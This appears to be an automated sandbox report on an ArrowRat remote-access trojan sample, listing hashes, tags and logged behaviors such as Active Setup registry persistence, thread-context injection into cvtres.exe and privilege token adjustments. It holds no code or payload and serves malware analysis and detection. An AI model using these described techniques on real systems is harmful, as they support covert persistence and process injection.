Malware Analysis Report

2024-10-10 10:32

Sample ID 230909-z21nzsdh9y
Target 869e6e56d6c9849420442213a468c9fc
SHA256 9f46555944110c0b982e05620a58e6a3828fa6ad8e8dd8f55894e25150207a5e
Tags
5t74s3 arrowrat persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9f46555944110c0b982e05620a58e6a3828fa6ad8e8dd8f55894e25150207a5e

Threat Level: Known bad

The file 869e6e56d6c9849420442213a468c9fc was found to be: Known bad.

Malicious Activity Summary

5t74s3 arrowrat persistence rat

ArrowRat

Arrowrat family

Modifies Installed Components in the registry

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Unsigned PE

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-09 21:13

Signatures

Arrowrat family

arrowrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-09 21:13

Reported

2023-09-09 21:18

Platform

win10-20230831-en

Max time kernel

300s

Max time network

302s

Command Line

"C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe"

Signatures

ArrowRat

rat arrowrat

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3004 set thread context of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\2717123927\3950266016.pri C:\Windows\explorer.exe N/A
File created C:\Windows\rescache\_merged\1601268389\3877292338.pri C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
File created C:\Windows\rescache\_merged\4032412167\2900507189.pri C:\Windows\explorer.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133379809249541381" C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002c100000000000002000000e70709004100720067006a006200650078002000200032000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000000f06e08762e3d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e70709004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c00000000000000000000000087ba938762e3d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e70708004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000004452b9163bdcd90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e7070800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e7070800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
